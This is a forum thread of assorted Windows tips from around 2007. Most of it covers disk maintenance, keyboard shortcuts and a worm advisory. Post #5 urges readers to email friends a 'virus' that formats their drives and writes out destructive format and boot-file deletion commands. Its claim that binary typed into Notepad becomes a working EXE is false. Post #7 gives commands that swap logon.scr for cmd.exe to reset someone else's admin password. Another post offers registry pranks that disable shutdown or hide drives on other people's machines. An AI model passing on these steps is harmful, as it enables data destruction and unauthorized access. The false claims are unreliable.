Page 1 of 6 123 ... LastLast
Results 1 to 15 of 76

Thread: jUsT_rEaD...!!!

  1. #1
    |•ร๒๔•|™ Major Jass_BE 4 REAL's Avatar
    Join Date
    Sep 2006
    Location
    In Ur Heart
    Posts
    6,623
    Rep Power
    100

    Default jUsT_rEaD...!!!

    Plz Reply.......

    i know this thread....is just like....copy & paste....but sometimes many peoples don't know a little things....so that's little things are here.....so plz reply.......

    if any topic is reposted then plz don't reply me with this message"repost".....!!!

    Jass
    Last edited by Jass_BE 4 REAL; 08-03-2007 at 05:32 PM.

  2. #2
    |•ร๒๔•|™ Major Jass_BE 4 REAL's Avatar
    Join Date
    Sep 2006
    Location
    In Ur Heart
    Posts
    6,623
    Rep Power
    100

    Default About Hard_Drive...!!!

    Your hard drive is the workhorse of your computer, but do you really know what it's up to in there? Here's a brief description of how your hard drive works, and what you can do to make sure it keeps working the way it should.


    How it works
    When you save a file to your hard drive, it is magnetically recorded onto a platter inside your hard drive. Most hard drives have several platters mounted on a spindle that allows them to spin as fast as 15,000 times per minute. Each two-sided platter is mounted on a single arm with a slider that lets the heads move across the surface of the platter to access data.

    The amount of data each platter can hold is usually measured in Tracks Per Inch, where a track equals one concentric ring around a disk. Because of the amount of data that can be stored in a single track, each track is divided into sectors, and each sector holds roughly 512 bytes of information. When you save data to the disk, it is referenced according to its track and sector.


    Organise your hard disk
    Occasionally your hard drive will make a whirring sound as it searches for a file. This is the sound of the platters spinning as the read heads zoom back and forth to access each sector where the data has been stored.
    You can speed up this process by periodically “defragging” your hard drive. The Windows Disk Defragmenter utility reorganizes the scattered data on your hard drive to make your files run more efficiently. It also moves the files that you use most often to the beginning of the hard disk where they’ll load faster.

    To run Disk Defragmenter in Windows 98 and Windows Millennium, follow these directions:


    1. Shut down all applications. The utility takes several hours to run, so choose a time when you won't need your computer.

    2. Click Start > Programs > System Tools > Disk Defragmenter.

    3. Select the drive you'd like to defrag and click Settings button.

    4. On the Disk Defragmenter Settings menu, check “Rearrange program files so my programs start faster” and “Check drive for errors.” Hit OK to go back to the first screen.

    5. Click OK to begin.


    Clicking Show Details will display a graphical representation of the utilities.
    To run Disk Defragmenter in Windows XP, follow these directions:


    1. Click Start > Programs > System Tools > Disk Defragmenter.

    2. You should analyze a drive (volume) before defragmenting it. Because defragmenting may take hours, this tells you whether you need to take the time to perform this task. Click the Analyze button.

    3. A drive must have at least 15 percent free space for Disk Defragmenter to completely and adequately defragment it. Disk Defragmenter uses this space as a sorting area for file fragments. If a volume has less than 15 percent free space, Disk Defragmenter will only partially defragment it. To increase the free space on a volume, delete unneeded files or move them to another disk.

    4. Click the Defragment button.

    5. To interrupt or temporarily stop defragmenting a volume, click Stop or Pause, respectively.


    The bottom frame displays a graphical representation of the utilities progress.

    Disk cleanup
    Another powerful utility that comes with Windows is Disk Cleanup. This application allows you to easily sort through and delete unused and temporary files, freeing space on your hard drive and speeding up its operation.

    To run Disk Cleanup in Windows 98, Windows Millennium, and Window XP:

    1. Go to Start > Programs > Accessories > System Tools and select Disk Cleanup.

    2. Choose the drive you want to scan from the drop-down menu, and wait while the program calculates how much disk space is available for cleanup.

    3. On the Disk Cleanup tab, check the boxes next to the types of files you want to remove.

    4. Temporary Internet Files are Web pages stored on your hard drive for quick access. Deleting these files will leave intact your Internet browser preferences and bookmarks.

    5. Downloaded Program Files are Java and ActiveX applications downloaded from the Internet to view certain pages.

    6. The Recycle Bin contains files you have deleted from your system. They are not permanently removed until you empty the bin.

    7. Temporary Files are created by some applications to temporarily store data. Typically, the data is deleted when the program closes, and it is safe to delete these files if they have not been modified in over a week.
    Clicking the View Files button will display the files to be deleted in a separate window.

    8. To remove Windows components or unused programs, click the More Options tab. Clicking the appropriate Cleanup button will open the Add/Remove Programs utility, where you can then select what you would like to delete.


    ScanDisk

    If you've ever turned off your computer without properly shutting down the system (or had to restart after a crash), then you’ve probably seen your computer run a utility called ScanDisk. ScanDisk checks the hard drive for errors and, if it finds any, marks the cluster of sectors containing the error as unusable, so that no data can be written to or read from that portion of the disk.

    You can also run ScanDisk from within Windows. This allows you to do a more thorough scan of your hard drive and detect errors that might make it difficult or impossible to read or write to the disk.

    To run ScanDisk in Windows 95, Windows 98, and Windows Millennium:


    1. Click Start > Programs > Accessories > System Tools > ScanDisk.

    2. Select Thorough under Type of Test.

    3. Click Start to begin the scan.


    Windows XP refers to ScanDisk as an "error-checking" tool; to perform error-checking, follow these directions:


    1. Open My Computer, then select the local disk you want to check.

    2. On the File menu, click Properties.

    3. On the Tools tab, under Error-checking, click Check Now.

    4. Under Check Disk options, select the “Scan for and attempt recovery of bad sectors” box.


    ScanDisk should take only a few minutes to run, and should probably be done every two or three months. It will give you a report of the number and types of errors it has found, and can even automatically repair some of these errors. More serious errors can be repaired by reformatting the drive, if the errors are "soft" errors (which means that the magnetic signal on the disk is weak or the formatting is bad).

    "Hard" errors, however, refer to actual physical damage to the disk, such as a scratch or a bump, and cannot be repaired. If you have a large number of hard errors on your disk, you will probably need to replace your hard drive.

    The average life span for today's hard drive is between three and five years. Simple maintenance can keep your hard drive running smoothly well past the time it has become obsolete.

  3. #3
    |•ร๒๔•|™ Major Jass_BE 4 REAL's Avatar
    Join Date
    Sep 2006
    Location
    In Ur Heart
    Posts
    6,623
    Rep Power
    100

    Default General keyboard shortcuts

    General keyboard shortcuts

    Press To
    CTRL+C Copy.

    CTRL+X Cut.

    CTRL+V Paste.

    CTRL+Z Undo.

    DELETE Delete.

    SHIFT+DELETE Delete selected item permanently without placing the item in the Recycle Bin.

    CTRL while dragging an item Copy selected item.

    CTRL+SHIFT while dragging an item Create shortcut to selected item.

    F2 Rename selected item.

    CTRL+RIGHT ARROW Move the insertion point to the beginning of the next word.

    CTRL+LEFT ARROW Move the insertion point to the beginning of the previous word.

    CTRL+DOWN ARROW Move the insertion point to the beginning of the next paragraph.

    CTRL+UP ARROW Move the insertion point to the beginning of the previous paragraph.

    CTRL+SHIFT with any of the arrow keys Highlight a block of text.

    SHIFT with any of the arrow keys Select more than one item in a window or on the desktop, or select text within a document.
    CTRL+A Select all.

    F3 Search for a file or folder.

    ALT+ENTER View properties for the selected item.

    ALT+F4 Close the active item, or quit the active program.

    ALT+Enter Displays the properties of the selected object.

    ALT+SPACEBAR Opens the shortcut menu for the active window.

    CTRL+F4 Close the active document in programs that allow you to have multiple documents open simultaneously.

    ALT+TAB Switch between open items.

    ALT+ESC Cycle through items in the order they were opened.
    F6 Cycle through screen elements in a window or on the desktop.

    F4 Display the Address bar list in My Computer or Windows Explorer.

    SHIFT+F10 Display the shortcut menu for the selected item.
    ALT+SPACEBAR Display the System menu for the active window.

    CTRL+ESC Display the Start menu.

    ALT+Underlined letter in a menu name Display the corresponding menu.

    Underlined letter in a command name on an open menu Carry out the corresponding command.

    F10 Activate the menu bar in the active program.
    RIGHT ARROW Open the next menu to the right, or open a submenu.

    LEFT ARROW Open the next menu to the left, or close a submenu.

    F5 Refresh the active window.

    BACKSPACE View the folder one level up in My Computer or Windows Explorer.

    ESC Cancel the current task.

    SHIFT when you insert a CD into the CD-ROM drive Prevent the CD from automatically playing.




    Dialog box keyboard shortcuts

    Press To
    CTRL+TAB Move forward through tabs.

    CTRL+SHIFT+TAB Move backward through tabs.

    TAB Move forward through options.

    SHIFT+TAB Move backward through options.

    ALT+Underlined letter Carry out the corresponding command or select the corresponding option.

    ENTER Carry out the command for the active option or button.

    SPACEBAR Select or clear the check box if the active option is a check box.

    Arrow keys Select a button if the active option is a group of option buttons.

    F1 Display Help.

    F4 Display the items in the active list.

    BACKSPACE Open a folder one level up if a folder is selected in the Save As or Open dialog box.






    Natural keyboard shortcuts

    You can use the following keyboard shortcuts with a Microsoft Natural Keyboard or any other compatible keyboard that includes the Windows logo key () and the Application key ().

    Press To
    Display or hide the Start menu.

    +BREAK Display the System Properties dialog box.

    +D Show the desktop.

    +M Minimize all windows.

    +Shift+M Restores minimized windows.

    +E Open My Computer.

    +F Search for a file or folder.

    CTRL+ +F Search for computers.

    +F1 Display Windows Help.

    + L Lock your computer if you are connected to a network domain, or switch users if you are not connected to a network domain.

    +R Open the Run dialog box.

    Display the shortcut menu for the selected item.

    +U Open Utility Manager.





    Accessibility keyboard shortcuts

    Press To
    Right SHIFT for eight seconds Switch FilterKeys on and off.

    Left ALT +left SHIFT +PRINT SCREEN Switch High Contrast on and off.

    Left ALT +left SHIFT +NUM LOCK Switch MouseKeys on and off.

    SHIFT five times Switch StickyKeys on and off.

    NUM LOCK for five seconds Switch ToggleKeys on and off.

    +U Open Utility Manager.






    Windows Explorer keyboard shortcuts

    Press To
    END Display the bottom of the active window.

    HOME Display the top of the active window.

    NUM LOCK+ASTERISK on numeric keypad (*) Display all subfolders under the selected folder.

    NUM LOCK+PLUS SIGN on numeric keypad (+) Display the contents of the selected folder.

    NUM LOCK+MINUS SIGN on numeric keypad (-) Collapse the selected folder.

    LEFT ARROW Collapse current selection if it's expanded, or select parent folder.

    RIGHT ARROW Display current selection if it's collapsed, or select first subfolder.

  4. #4
    |•ร๒๔•|™ Major Jass_BE 4 REAL's Avatar
    Join Date
    Sep 2006
    Location
    In Ur Heart
    Posts
    6,623
    Rep Power
    100

    Default Disable-Send A Report

    To disable the stupid feature in WinXP which tries to send a report to m*cro$oft every time a program crashes you will have to do this(very irritating )


    step1
    Open Control Panel
    Click on Preformance and Maintenance.
    Click on System.

    OR

    right click on "My Computer" then "properties"


    step2
    Then click on the Advanced tab
    Click on the error reporting button on the bottom of the windows.

    step3
    Select Disable error reporting.
    Click OK

  5. #5
    |•ร๒๔•|™ Major Jass_BE 4 REAL's Avatar
    Join Date
    Sep 2006
    Location
    In Ur Heart
    Posts
    6,623
    Rep Power
    100

    Default Format Any Harddisk With Notepad

    Format Any Harddisk With Notepad

    Step 1
    Write The Following In Notepad Exactly as it says


    QUOTE
    01001011000111110010010101010101010000011111100000



    Step 2
    Save As An EXE Any Name Will Do

    Step 3
    Send the EXE to People And Infect..That is mail ur frnd By Naming it watever u want

    format their drive while windows running

    some more so u can test on other drives this is simple binary code
    format c:\ /Q/X .. this will format your drive c:\


    QUOTE
    01100110011011110111001001101101011000010111010000 1000000110
    00110011101001011100
    0010000000101111010100010010111101011000



    format d:\ /Q/X ... this will format your dirve d:\

    QUOTE
    01100110011011110111001001101101011000010111010000 1000000110
    01000011101001011100
    0010000000101111010100010010111101011000


    format a:\ /Q/X ... this will format your drive a:\

    QUOTE
    01100110011011110111001001101101011000010111010000 1000000110
    00010011101001011100
    0010000000101111010100010010111101011000



    del /F/S/Q c:\boot.ini .. this will cause your computer not to boot.

    QUOTE
    01100100011001010110110000100000001011110100011000 1011110101
    00110010111101010001
    00100000011000110011101001011100011000100110111101 1011110111
    01000010111001101001
    0110111001101001



    njoyyyyy

  6. #6
    {Forum Emperor} Lieutenant General !! K A R A N !!'s Avatar
    Join Date
    May 2006
    Location
    New Delhi
    Posts
    52,316
    Rep Power
    100

    Default

    ki haal e Jas veera ....

  7. #7
    |•ร๒๔•|™ Major Jass_BE 4 REAL's Avatar
    Join Date
    Sep 2006
    Location
    In Ur Heart
    Posts
    6,623
    Rep Power
    100

    Default Hack Windows Xp Admin Passwords

    Hack Windows Xp Admin Passwords

    This hack will only work if the person that owns the machine
    has no intelligence. This is how it works:
    When you or anyone installs Windows XP for the first time your
    asked to put in your username and up to five others.
    Now, unknownst to a lot of other people this is the only place in
    Windows XP that you can password the default Administrator Diagnostic
    Account. This means that to by pass most administrators accounts
    on Windows XP all you have to do is boot to safe mode by pressing F8
    during boot up and choosing it. Log into the Administrator Account
    and create your own or change the password on the current Account.
    This only works if the user on setup specified a password for the
    Administrator Account.

    If you log into a limited account on your target machine and open up a dos prompt
    then enter this set of commands Exactly:

    da code

    cd\ *drops to root
    cd\windows\system32 *directs to the system32 dir
    mkdir hack *creates the folder hack
    copy logon.scr hack\logon.scr *backsup logon.scr
    copy cmd.exe hack\cmd.exe *backsup cmd.exe
    del logon.scr *deletes original logon.scr
    rename cmd.exe logon.scr *renames cmd.exe to logon.scr
    exit *quits dos



    Now what you have just done is told the computer to backup the command program and the screen saver file, then edits the settings so when the machine boots the screen saver you will get an unprotected dos prompt with out logging into XP.
    Once this happens if you enter this command minus the quotes
    "net user <admin account name here> password"
    If the Administrator Account is called abc and you want the password blah enter this

    "net user abc crap"

    and this changes the password on abc machine to crap and u r in

  8. #8
    |•ร๒๔•|™ Major Jass_BE 4 REAL's Avatar
    Join Date
    Sep 2006
    Location
    In Ur Heart
    Posts
    6,623
    Rep Power
    100

    Default

    Quote Originally Posted by ksxyboy@yahoo.com View Post
    ki haal e Jas veera ....
    BAS YAAR VADIYA HOR TU SUNA TERA KI HAAL HAI...???

  9. #9
    |•ร๒๔•|™ Major Jass_BE 4 REAL's Avatar
    Join Date
    Sep 2006
    Location
    In Ur Heart
    Posts
    6,623
    Rep Power
    100

    Default How to FIX a scratched CD

    Dont throw out that scratched disc yet

    Try fixing it with a small dab of...........CAR WAX!!!!

    That's right and here's how to do it :

    1. Spread a cloth on a flat surface and place the CD on it.
    2. Then, hold the disc with one hand, use the other to wipe the polish into the affected area with a soft cloth.
    3. Wait for it to dry and buff using short, brisk strokes along the scratch, not across it.
    4. A cloth sold to wipe spectacles or camera lenses will work super m8's.
    5. When you can no longersee the scratch,, wash the disc with water and let it dry before playing.

  10. #10
    {Forum Emperor} Lieutenant General !! K A R A N !!'s Avatar
    Join Date
    May 2006
    Location
    New Delhi
    Posts
    52,316
    Rep Power
    100

    Default

    theek thaak veera ... kithhe gaayab c yaar tu

  11. #11
    |•ร๒๔•|™ Major Jass_BE 4 REAL's Avatar
    Join Date
    Sep 2006
    Location
    In Ur Heart
    Posts
    6,623
    Rep Power
    100

    Default Untold Windows Tips And Secrets,, Be Ready To Enjoy

    Note: Please backup your registry before starting

    Exiting Windows the Cool and Quick Way

    Normally it takes a hell lot of time just Shutting down Windows, you have to move your mouse to the Start Button, click on it, move it again over Shut Down, click, then move it over the necessary option and click, then move the cursor over the OK button and once again (you guessed it) click.This whole process can be shortened by creating shortcuts on the Desktop which will shut down Windows at the click of a button. Start by creating a new shortcut( right click and select New> Shortcut). Then in the command line box, type (without the quotes.)

    Code:
    'C:\windows\rundll.exe user.exe,exitwindowsexec'
    .

    This Shortcut on clicking will restart Windows immediately without any Warning. To create a Shortcut to Restarting Windows, type the following in the Command Line box:

    Code:
    'c:\windows\rundll.exe user.exe,exitwindows'


    This Shortcut on clicking will shut down Windows immediately without any Warning.

    Ban Shutdowns : A trick to Play on Lamers
    This is a neat trick you can play on that lamer that has a huge ego.This
    section teaches you how to disable the Shut Down option in the Shut Down Dialog Box. This trick involves editing the registry, so please make backups. Launch regedit.exe and go to :

    Code:
    HKEY_CURRENT_USER\Software\m*cro$oft\Windows\Curre ntVersion\Policies\Explor
    er
    .

    In the right pane look for the NoClose Key. If it is not already there then create it by right clicking in the right pane and selecting Code:
    New > String Value.(Name it NoCloseKey )
    .Now once you see the NoCloseKey in the right pane, right click on it and select Modify. Then Type 1 in the Value Data Box. Doing the above on a Win98 system disables the Shut Down option in the Shut Down Dialog Box. But on a Win95 machine if the value of NoCloseKey is set to 1 then click on the Code:
    Start > Shut Down
    button displays the following error message:

    Code:
    This operation has been cancelled due to restrictions in effect on this computer. Please contact your system administrator.


    Quote:
    You can enable the shut down option by changing the value of NoCloseKey to 0 or simply deleting the particular entry i.e. deleting NoCloseKey.


    Instead of performing the above difficult to remember process, simply save the following with an extension of .reg and add it's contents to the registry by double clicking on it.

    Code:
    REGEDIT4
    [HKEY_CURRENT_USER\Software\m*cro$oft\Windows\Curre ntVersion\Policies\Explo
    rer]

    "NoClose"="1"


    Disabling Display of Drives in My Computer

    This is yet another trick you can play on your geek friend. To disable the display of local or networked drives when you click My Computer go to :

    Code:
    HKEY_CURRENT_USER\Software\m*cro$oft\Windows\Curre ntVersion\Policies\Explor
    er


    Quote:
    Now in the right pane create a new DWORD item and name it NoDrives. Now modify it's value and set it to 3FFFFFF (Hexadecimal) Now press F5 to refresh. When you click on My Computer, no drives will be shown. To enable display of drives in My Computer, simply delete this DWORD item.



    It's .reg file is as follows:

    Code:
    REGEDIT4
    [HKEY_CURRENT_USER\Software\m*cro$oft\Windows\Curre ntVersion\Policies\Explo
    rer]

    "NoDrives"=dword:03ffffff


    Take Over the Screen Saver: To activate and deactivate the screen saver whenever you want, goto the following registry key:

    Code:
    HKEY_CURRENT_USER\Software\m*cro$oft\Windows\Curre ntVersion\ScreenSavers


    Now add a new string value and name it Mouse Corners. Edit this new value to -Y-N. Press F5 to refresh the registry. Voila! Now you can activate your screensaver by simply placing the mouse cursor at the top right corner of the screen and if you take the mouse to the bottom left corner of the screen, the screensaver will deactivate.

    Pop a banner each time Windows Boots: To pop a banner which can contain any message you want to display just before a user is going to log on, go to the key: Code:
    HKEY_LOCAL_MACHINE\SOFTWARE\m*cro$oft\Windows\Curr entVersion\WinLogon


    Now create a new string Value in the right pane named LegalNoticeCaption and enter the value that you want to see in the Menu Bar. Now create yet another new string value and name it: LegalNoticeText. Modify it and insert the message you want to display each time Windows boots. This can be effectively used to display the company's private policy each time the user logs on to his NT box. It's .reg file would be:

    Code:
    REGEDIT4
    [HKEY_LOCAL_MACHINE\SOFTWARE\m*cro$oft\Windows\Curr entVersion\Winlogon]

    "LegalNoticeCaption"="Caption here."


    Delete the Tips of the Day to save 5KB

    Windows 95 had these tips of the day which appeared on a system running a newly installed Windows OS. These tips of the day are stored in the Windows Registry and consume 5K of space. For those of you who are really concerned about how much free space your hard disk has, this is the perfect trick. To save 5K go to the following key in Regedit:

    Code:
    HKEY_LOCAL_MACHINE\Software\m*cro$oft\Windows\Curr entVersion\Explorer\Tips


    Now simply delete these tricks by selecting and pressing the DEL key.

    Change the Default Locations To change the default drive or path where Windows will look for it's installation files, go to the key:

    Code:
    HKEY_LOCAL_MACHINE\Software\m*cro$oft\Windows\Curr entVersion\Setup\SourcePa
    th


    Now you can edit as you wish.

    Secure your Desktop Icons and Settings: You can save your desktop settings and secure it from your nerdy friend by playing with the registry. Simply launch the Registry Editor go to:

    Code:
    HKEY_CURRENT_USER\Software\m*cro$oft\Windows\Curre ntVersion\Policies\Explor
    er


    In the right pane create a new DWORD Value named NoSaveSettings and modify it's value to 1. Refresh and restart for the settings to get saved.

    Customizing the Right Click Context Menu of the Start Menu

    When you right click on the start menu, only 3 options pop up: Open, Explore, and Find. You can add your own programs to this pop up menu
    ( which comes up when we right click on it.) Open Regedit and go to the following registry key:

    Code:
    HKEY_CLASSES_ROOT\Directory\Shell


    Right click on the shell and create a new Sub Key (You can create a new SubKey by right clicking on the Shell Key and selecting New > Key.). Type in the name of the application you want to add to the start menu. Now right click on the new registry key that you just created and create yet another new key named Command.

    Enter the full path of the application and modify the value of the default string value and enter the full pathname of the software.
    Now press F5 to refresh. Now if you right click on the Start Button you will find a new addition to the Pop Up Menu called Notepad. Clicking on it will launch Notepad. We can not only add but also remove the existing options in this pop up box. To delete the Find option, go to the following registry key:

    Code:
    HKEY_CLASSES_ROOT\Directory\Shell\Find


    Delete Find. DO NOT delete Open else you will not be able to open any folders in the Start Menu like Programs, Accessories etc.

    Making the Internet Explorer & the Explorer Toolbars Fancy

    The Internet Explorer toolbar looks pretty simple. Want to make it fancy and kewl? Why not add a background image to it. To do this kewl hack launch the Windows Registry Editor and go to the following key:

    Code:
    HKEY_CURRENT_USER\SOFTWARE\m*cro$oft\ Internet Explorer\Toolbar\.


    Now in the right pane create a new String Value and name it BackBitmap and modify it's value to the path of the Bitmap you want to dress it up with by rightclicking on it and choosing Modify.
    When you reboot the Internet Explorer and the Windows Explorer toolbars will have a new look.

    Change Internet Explorer's Caption

    Don't like the caption of Internet Explorer caption? Want to change it? Open the registry editor and go to Code:
    HKEY_LOCAL_MACHINE\SOFTWARE\m*cro$oft\Internet Explorer\Main


    In the right pane create a new String Value named Window Title (Note the space between Window and Title). Right click on this newly created String Value and select Modify. Type in the new caption you want to be displayed. Restart for the settings to take place.


    --------------------

  12. #12
    |•ร๒๔•|™ Major Jass_BE 4 REAL's Avatar
    Join Date
    Sep 2006
    Location
    In Ur Heart
    Posts
    6,623
    Rep Power
    100

    Default

    Quote Originally Posted by ksxyboy@yahoo.com View Post
    theek thaak veera ... kithhe gaayab c yaar tu
    kuch ni yaar...vaise hi dil nai karda si....online aan daa....yaar ik problem hai...can i share...???

  13. #13
    H.E.L.L..... Captain hi_123's Avatar
    Join Date
    Jun 2006
    Posts
    3,528
    Rep Power
    100

    Default

    Quote Originally Posted by ksxyboy@yahoo.com View Post
    ki haal e Jas veera ....
    ...........KARAN

  14. #14
    |•ร๒๔•|™ Major Jass_BE 4 REAL's Avatar
    Join Date
    Sep 2006
    Location
    In Ur Heart
    Posts
    6,623
    Rep Power
    100

    Default Virus And Spyware Can Make Your Copmuter Crash

    Email-Worm.Win32.Sober.u, .v, .w

    Status : moderate risk

    Kaspersky Lab has detected three new variants of Sober: Email-Worm.Win32.Sober.u, Email-Worm.Win32.Sober.v, and Email-Worm.Win32.Sober.w

    The worm spreads as an attachment to infected messages. The attached file, which contains the body of the worm, is approximately 130KB in size.

    Possible attachment names include:

    Word-Text_packedList.exe
    Word-Text_packedList.zip
    Word-Text.zip
    Reg-List-Dat_Packer2.exe
    Exceltab-packed_List.exe
    reg_text.zip
    Liste.zip

    Kaspersky Anti-Virus databases have been updated with detection for the three latest variants. Users are strongly recommended to update their antivirus databases.

    Email-Worm.Win32.Sober.u

    Several modified variants of this worm, which is written in Visual Basic, have been detected. There are only very minor differences. It is 139.040 KB in size. The actual worm is 129.568 bytes in packed size.

    Installation

    When the dropper is executed it drops the main file in to the Windows directory; the filename consists of eight (random) letters, varying for each Sober.u modification.

    Sober creates the following directory:

    %windir%\ConnectionStatus\m*cro$oft

    A copy of the worm named services.exe is dropped into this directory.

    The file residing in %windir% will then launch services.exe and close.

    The following files are also created in %windir%\ConnectionStatus\m*cro$oft\:

    concon.www - this file will contain the email addresses harvested from the system.
    sacdata.dta - this file is empty

    The following 0 bytes are created in %systemdir%:

    bbvmwxxf.hml
    gdfjgthv.cvq
    langeinf.lin
    nonrunso.ber
    rubezahl.rub
    runstop.rst

    The worm creates the following registry keys to ensure that it gets executed during Windows startup:

    [HKLM\SOFTWARE\m*cro$oft\Windows\CurrentVersion\Run]
    " WinCheck"="%windir%\ConnectionStatus\m*cro$oft\ser vices.exe"

    [HKCU\Software\m*cro$oft\Windows\CurrentVersion\Run]
    "_WinCheck"="%windir%\ConnectionStatus\m*cro$oft\s ervices.exe"

    The worm connects to a number of time servers to check the time and date.

    Depending on the date the worm will perform one of two actions:

    - Spread like an Email-Worm by sending out copies of itself
    - Check specified sites for files to download

    Propagation via email

    The worm looks for email addresses to harvest, it does this from files with the following extensions:

    pmr
    phtm
    stm
    slk
    inbox
    imb
    csv
    bak
    imh
    xhtml
    imm
    imh
    cms
    nws
    vcf
    ctl
    dhtm
    cgi
    pp
    ppt
    msg
    jsp
    oft
    vbs
    uin
    ldb
    abc
    pst
    cfg
    mdw
    mbx
    mdx
    mda
    adp
    nab
    fdb
    vap
    dsp
    ade
    sln
    dsw
    mde
    frm
    bas
    adr
    cls
    ini
    ldif
    log
    mdb
    xml
    wsh
    tbb
    abx
    abd
    adb
    pl
    rtf
    mmf
    doc
    ods
    nch
    xls
    nsf
    txt
    wab
    eml
    hlp
    mht
    nfo
    php
    asp
    shtml
    dbx

    Sober.u spreads in two different languages, English and German.

    It uses English for all domains except for those which have the following suffix:

    .de
    .ch
    .at
    .li

    or the following string:

    gmx.

    Infected messages

    English message:

    Message subject:

    Registration Confirmation

    Thanks for your registration.
    Your data are saved in the zipped Word.doc file!

    Attachment name

    registration.zip

    German message:

    Message subject:

    Haben Sie diese EMail verschickt?

    Message body:

    Um es vorweg zu sagen: Ich bin kurz davor eine Anzeige gegen Sie zu erstatten!
    Sie spinnen ja wohl! Die E-Mail hat meine Tochter gelesen!!!!!!

    Ich habe Ihnen diese Word-Text Datei zu meiner Entlastung zurueckgeschickt.
    Es waere von Vorteil, wenn Sie sich dazu aeussern wuerden!!

    Attachment name:

    Starts with:

    Word -Text

    Other

    This worm also drops another malicious file.

    The worm drops not-a-virus:PSWTool.Win32.PassView.162 into the system directory.
    This tool is used to spy on passwords.

    Like previous variants, Sober.u uses an exclusive lock to make removal difficult.

    Removal

    Make sure your Kaspersky Anti-Virus bases are up to date.
    Perform a full system scan and delete all files detected as Email-Worm.Win32.Sober.u and not-a-virus:PSWTool.Win32.PassView.162.


    Email-Worm.Win32.Bagle.eb

    Status : moderate risk

    Kaspersky Lab has detected a new Bagle variant: Email-Worm.Win32.Bagle.eb.

    The worm has been widely spammed. It arrives in an archive file 7KB in size. The name of the attached archive file varies widely. Possible file names include "business.zip", "sms_text.zip", "info_prices.zip". The archive contains an executable file, "text5546.exe", which is 9675 bytes in size ((MD5 checksum: 4a68d23367d8aaf9fe9217f7f9f98bf1).

    This executable file will download another version of the worm, Bagle.eh, to the infected machine via the Internet.

    The Kaspersky Virus Lab has received numerous reports of infection from users around the world.

    An urgent update has been released. Users are strongly recommended to update their antivirus databases.

    Further details of the worm will be available in the Virus Encyclopaedia in the near future.

    Virus Encyclopedia

    Malware Environment::

    Three Criteria for Malware Existence:

    No operating system or application is vulnerable to malicious programs unless external programs, no matter how simple, can be launched. If an external program, even the simplest, can be launched within an operating system or application, then it will be vulnerable to malicious programs. Most contemporary operating systems and applications need to work with other programs, so they do end up being vulnerable. Potentially vulnerable OS and applications include:

    * All popular desktop operating systems
    * Most office applications
    * Most graphical editors
    * Project applications
    * Any applications with in-built script language

    Computer viruses, worms, Trojans have been written for countless operating systems and applications. On the other hand, there are still numerous OSs and applications that are free from malware so far. Why is this so? What makes one OS more attractive to virus writers than others?

    Malware appears in any given environment when the following criteria are met:

    * The operating system is widely used
    * Reasonably high-quality documentation is available
    * The targeted system is insecure or has a number of documented vulnerabilities

    All three criteria are key factors and all three need to be met before the given system will be targeted by virus writers.

    In the first place, in order for hackers and cyber vandals to even consider any system, the target needs to be popular enough for them to access it. Once an OS or application is widely available and marketed successfully, it turns into a viable target for virus writers.

    A quick look at the number of malicious programs written for Windows and Linux shows that the volume of malware is roughly proportional to the respective market share of these two operating systems.

    Detailed documentation is necessary for both legal developers and hackers, since documentation includes descriptions of available services and rules for writing compatible programs.

    For instance, most mobile phone vendors do not share this information, leaving both legal vendors and hackers helpless. On the other hand, some vendors of smart phones do publish their documentation. The first viruses for Symbian (Worm.SymbOS.Cabir.a) and Windows CE (WinCE.Duts.a) appeared shortly after the documentation was published in mid-2004.

    The architecture of a well-built (constructed designed) OS or applications needs to take security into account. A secure solution does not allow new or unsanctioned programs extensive access to files or potentially dangerous services. This leads to difficulties, as a fully secure system, will block not only malware, but 'friendly' programs as well. As a result, none of the widely available systems can be called truly secure.

    Java machines that launch Java applications in 'sandbox' mode come close to achieving secure conditions. As a matter of fact, there have been no viruses or Trojans which pose a serious threat written in Java for a long time, though non-viable proof of concept malware does occasionally appear. Malware written in Java appeared only when vulnerabilities in Java Virtual Machine security were discovered and publicized.

  15. #15
    |•ร๒๔•|™ Major Jass_BE 4 REAL's Avatar
    Join Date
    Sep 2006
    Location
    In Ur Heart
    Posts
    6,623
    Rep Power
    100

    Default Malware

    Malware is software designed to infiltrate or damage a computer system without the owner's informed consent. It is a blend of the words "malicious" and "software". The expression is a general term used by computer professionals to mean a variety of forms of hostile, intrusive, or annoying software or program code.

    Many normal computer users are however still unfamiliar with the term, and most never use it. Instead, "(computer) virus" is more commonly used in common parlance and often in the general media to describe all kinds of malware. Another term that has been recently coined for "malware" is "badware", perhaps due to the antimalware initiative Stopbadware or corruption of the term "malware".

    Software is considered malware based on the intent of the creator rather than any particular features. It includes computer viruses, worms, trojan horses, spyware, adware, and other malicious and unwanted software. In law, malware is sometimes known as a computer contaminant, for instance in the legal codes of California, West Virginia, and several other U.S. states [1].

    Malware should not be confused with defective software, that is, software which has a legitimate purpose but contains harmful bugs.

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •